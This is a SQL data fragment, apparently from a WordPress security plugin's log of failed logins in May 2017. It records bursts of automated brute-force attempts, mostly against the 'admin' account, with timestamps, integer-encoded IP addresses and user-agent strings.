(100629, 1496173925.130036, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100628, 1496173924.815917, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100627, 1496173924.501441, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100626, 1496173924.192151, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100625, 1496173923.879512, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100624, 1496173923.568412, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100623, 1496173923.258438, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100622, 1496173922.942459, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100621, 1496173922.629733, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100620, 1496173922.319302, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100619, 1496173922.008320, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100618, 1496173921.695776, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100617, 1496173921.385962, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100616, 1496173921.075427, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100615, 1496173920.758551, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100614, 1496125580.761098, 1, 'loginFailInvalidUsername', 'notre', 0, 2734175325, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100613, 1496125251.112699, 1, 'loginFailInvalidUsername', 'outils', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100612, 1496125087.725602, 1, 'loginFailInvalidUsername', 'venez', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100611, 1496125083.405617, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100610, 1496125080.794971, 1, 'loginFailInvalidUsername', 'cross', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100609, 1496125077.688888, 1, 'loginFailInvalidUsername', 'pour', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100608, 1496125073.633974, 1, 'loginFailInvalidUsername', 'notre', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100607, 1496125070.106179, 1, 'loginFailInvalidUsername', 'training', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100606, 1496125067.574683, 1, 'loginFailInvalidUsername', 'vous', 0, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100605, 1496125064.327674, 1, 'loginFailValidUsername', 'pablo', 3, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100604, 1496125061.128359, 1, 'loginFailValidUsername', 'julie', 2, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100603, 1496125058.541949, 1, 'loginFailValidUsername', 'admin', 1, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100602, 1496116531.012500, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100601, 1496116530.697078, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100600, 1496116530.388610, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100599, 1496116530.069227, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100598, 1496116529.758272, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100597, 1496116529.447771, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100596, 1496116529.138821, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100595, 1496116528.826888, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100594, 1496116528.517273, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100593, 1496116528.208393, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100592, 1496116527.898955, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100591, 1496116527.585318, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100590, 1496116527.275569, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100589, 1496116526.961246, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100588, 1496116526.651248, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100587, 1496116526.330003, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100586, 1496116526.021421, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100585, 1496116525.712397, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100584, 1496116525.347731, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100583, 1496087364.255745, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100582, 1496087363.947303, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100581, 1496087363.637986, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100580, 1496087363.327778, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100579, 1496087363.017670, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100578, 1496087362.709613, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100577, 1496087362.400726, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100576, 1496087362.092075, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100575, 1496087361.780592, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100574, 1496087361.469172, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100573, 1496087361.155119, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100572, 1496087360.842256, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100571, 1496087360.528953, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100570, 1496087360.219965, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100569, 1496087359.908039, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100568, 1496087359.551049, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100567, 1496087359.236442, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100566, 1496087358.927704, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100564, 1496016405.395154, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100565, 1496087358.584144, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100562, 1496016404.997894, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100563, 1496016405.084761, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100560, 1496016404.693396, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100561, 1496016404.770173, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100558, 1496016404.458224, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100559, 1496016404.685631, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100556, 1496016404.374847, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100557, 1496016404.383853, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100554, 1496016404.149709, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100555, 1496016404.374245, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100552, 1496016404.066835, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100553, 1496016404.074477, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100550, 1496016404.065397, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100551, 1496016404.065589, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100548, 1496016403.760200, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100549, 1496016403.838880, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100546, 1496016403.750492, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100547, 1496016403.757606, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100544, 1496016403.529836, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100545, 1496016403.747813, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100542, 1496016403.432626, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100543, 1496016403.436577, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100540, 1496016403.428169, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100541, 1496016403.428717, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100538, 1496016403.128576, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100539, 1496016403.218667, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100536, 1496016403.117489, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100537, 1496016403.122014, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100534, 1496016402.902464, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100535, 1496016403.117732, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100532, 1496016402.775654, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100533, 1496016402.813926, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100530, 1496016402.754682, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100531, 1496016402.767692, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100528, 1496016402.505369, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100529, 1496016402.593704, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100526, 1496016402.454334, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100527, 1496016402.463289, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100524, 1496016402.284892, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100525, 1496016402.446867, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100522, 1496016402.155409, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100523, 1496016402.194208, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100520, 1496016402.138198, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100521, 1496016402.145432, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100518, 1496016401.875938, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100519, 1496016401.975821, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100516, 1496016401.836254, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100517, 1496016401.846428, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100514, 1496016401.666978, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100515, 1496016401.829537, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100512, 1496016401.537333, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100513, 1496016401.562412, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100510, 1496016401.519704, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100511, 1496016401.527826, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100508, 1496016401.236553, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100509, 1496016401.354928, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100506, 1496016401.216912, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100507, 1496016401.228306, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100504, 1496016401.045579, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100505, 1496016401.210446, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100502, 1496016400.918361, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100503, 1496016400.926889, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100500, 1496016400.899587, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100501, 1496016400.907911, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100498, 1496016400.613074, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100499, 1496016400.617509, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100496, 1496016400.594671, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100497, 1496016400.604947, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100494, 1496016400.303248, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100495, 1496016400.588339, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100492, 1496016400.290370, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100493, 1496016400.293794, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100490, 1496016400.276140, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100491, 1496016400.281565, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100488, 1496016399.973968, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100489, 1496016399.984421, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100486, 1496016399.969859, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100487, 1496016399.971270, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100484, 1496016399.673952, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100485, 1496016399.963848, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100482, 1496016399.661249, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100483, 1496016399.663588, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100480, 1496016399.651304, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100481, 1496016399.659493, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100478, 1496016399.333732, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100479, 1496016399.339898, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100476, 1496016399.333157, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100477, 1496016399.333422, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100474, 1496016399.007032, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100475, 1496016399.311909, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100472, 1496016399.005448, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100473, 1496016399.005523, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100470, 1496016399.001310, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100471, 1496016399.005254, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100468, 1496016398.624329, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100469, 1496016398.625248, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100466, 1496016398.617469, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100467, 1496016398.624318, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100464, 1496016398.285061, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100465, 1496016398.604779, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100463, 1496016398.265423, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100461, 1496016398.263811, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100462, 1496016398.264197, 1, 'loginFailValidUsername', 'admin', 1, 1539837113, ''),
(100460, 1496015193.604173, 1, 'loginFailInvalidUsername', 'outils', 0, 2032732065, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100459, 1496014517.229718, 1, 'loginFailInvalidUsername', 'notre', 0, 700515628, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100458, 1496014267.226688, 1, 'loginFailInvalidUsername', 'outils', 0, 3586257058, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100457, 1496012986.492475, 1, 'loginFailValidUsername', 'admin', 1, 2032732065, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100456, 1496005374.293655, 1, 'loginFailInvalidUsername', 'wpupdatestream', 0, 1539837019, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_34_87; rv:45.75.28) Gecko/20130448 Firefox/45.75.28'),
(100455, 1495985527.741954, 1, 'loginFailValidUsername', 'admin', 1, 781668949, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100454, 1495979518.691432, 1, 'loginFailValidUsername', 'admin', 1, 529854975, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100453, 1495977625.050078, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1046956164, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100452, 1495976311.694372, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1489572659, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100451, 1495975788.074677, 1, 'loginFailInvalidUsername', '{login}', 0, 1501163646, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100450, 1495973935.874243, 1, 'loginFailValidUsername', 'admin', 1, 786077451, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100449, 1495971977.145649, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3397466494, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100448, 1495970056.012755, 1, 'loginFailInvalidUsername', '{login}', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100447, 1495968066.229732, 1, 'loginFailValidUsername', 'admin', 1, 1342920287, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100446, 1495966069.598939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 48857242, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100445, 1495964906.730744, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100444, 1495964906.419404, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100443, 1495964906.110184, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100442, 1495964905.798287, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100441, 1495964905.487291, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100440, 1495964905.177943, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100439, 1495964904.868015, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100438, 1495964904.557970, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100437, 1495964904.246010, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100436, 1495964903.936379, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100435, 1495964903.586192, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100434, 1495964903.277795, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100433, 1495964902.968805, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100432, 1495964902.659475, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100431, 1495964902.349846, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100430, 1495964901.984736, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100429, 1495964901.674331, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100428, 1495964901.361866, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100427, 1495964901.050263, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100426, 1495961949.028136, 1, 'loginFailValidUsername', 'admin', 1, 1835211794, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100425, 1495957823.960962, 1, 'loginFailInvalidUsername', '{login}', 0, 3254658395, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
